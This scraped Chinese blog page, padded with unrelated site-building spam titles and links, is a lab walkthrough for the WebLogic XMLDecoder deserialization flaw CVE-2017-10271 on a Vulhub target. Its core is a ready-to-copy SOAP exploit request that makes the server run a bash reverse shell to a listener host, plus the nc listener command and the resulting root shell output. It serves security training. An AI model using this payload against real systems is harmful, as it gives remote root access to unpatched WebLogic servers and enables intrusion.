当前位置: 首页 > news >正文

上门做网站哪里有php做网站毕设答辩问什么

上门做网站哪里有,php做网站毕设答辩问什么,高端品牌网站开发,wordpress侧边栏文章目录漏洞成因 Weblogic的WLS Security组件对外提供 webservice服务 其中使用了XMLDecoder来 解析用户传入的XML数据 在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令 原理:https://xz.aliyun.com/t/10172 靶场部署 1.进入靶场目录 cd /vulhub-maste…

漏洞成因

Weblogic的WLS Security组件对外提供 webservice服务

其中使用了XMLDecoder来 解析用户传入的XML数据

在解析的过程中出现 反序列化漏洞 ,导致可执行任意命令
原理:https://xz.aliyun.com/t/10172

靶场部署

1.进入靶场目录

cd /vulhub-master/weblogic/CVE-2017-10271

2.开启靶场【报错重启docker服务】

[root@localhost CVE-2017-10271]# docker-compose up -d
 
3.查看靶场端口

[root@localhost CVE-2017-10271]# docker ps

 4.访问靶场

192.168.10.5:7001

漏洞利用

1.漏洞发生页

192.168.10.5:7001/wls-wsat/CoordinatorPortType

2.配置poc

192.168.10.5 改成你的CentOS IP
192.168.10.128 改成你的Kali IP
8888 改成你的Kali监听端口

==========从以下内容开始复制==========
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.10.5:7001
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: text/xml
Content-Length: 640

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.10.128/8888 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

3.kali监听 8888 端口

nc -lvp 8888

4.bp发送poc请求包

修改右上角 Target

 

 粘贴并发送

5.连接建立成功

 

┌──(root㉿kali)-[~]
└─# nc -lvp 8888
listening on [any] 8888 ...
192.168.10.5: inverse host lookup failed: Unknown host
connect to [192.168.10.128] from (UNKNOWN) [192.168.10.5] 45432
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@af29889df405:~/Oracle/Middleware/user_projects/domains/base_domain# 

http://www.yayakq.cn/news/490945/

相关文章:

  • 工信部 网站 备案北京网站建设公司 蓝纤科技 网络服务
  • 做网站月薪资多少钱纪检监察网站建设情况汇报
  • 网站上传服务器教程网站绝对路径
  • wap建站程序免费下载大学校园门户网站建设方案
  • 用备份的网站代码做网站步骤公司网站怎么建站
  • 网站定制微安电力案例教学网站开发应用指导方案
  • 百度 网站添加苏州有什么好玩的景点
  • 莱芜企业网站建设公司点网站建设
  • 百度竞价网站怎么做wordpress 分享 点赞
  • dede网站建设流程seo标签优化
  • 济南建网站多少钱鲤城区建设局网站
  • 门户网站开发意义宜昌网站企业
  • 国外网站配色为什么网站建设图片显示不出来
  • 潮阳网站制作注册免费域名网站
  • 长宁苏州网站建设电子商务网站管理
  • QQ可以在网站做临时会话么珠海斗门建设局网站
  • 网站建设方案范本学院网站建设进度情况说明
  • 游戏ui素材网站网站的中英文切换怎么做
  • 微信网站公众平台东莞网页设计教程
  • wordpress 本地建站教程类似wordpress的网站
  • 谷歌网站推广费用和小男生做的网站
  • 网店网站建设dw做网站怎么设置页面音乐
  • 潜力的网站设计制作在线做头像网站
  • 兰州网站建设王道下拉強东莞市建设工程交易中心网
  • 河北沧州做网站的电话网站设计 专业
  • 360建站和凡科哪个好哪个网站是vue做的
  • 百度站长工具是什么意思google play下载安装
  • 重庆sem优化佛山网站快照优化公司
  • 中国建设手机银行网站网站搭建的步骤
  • 网页设置安全站点网站建设 团队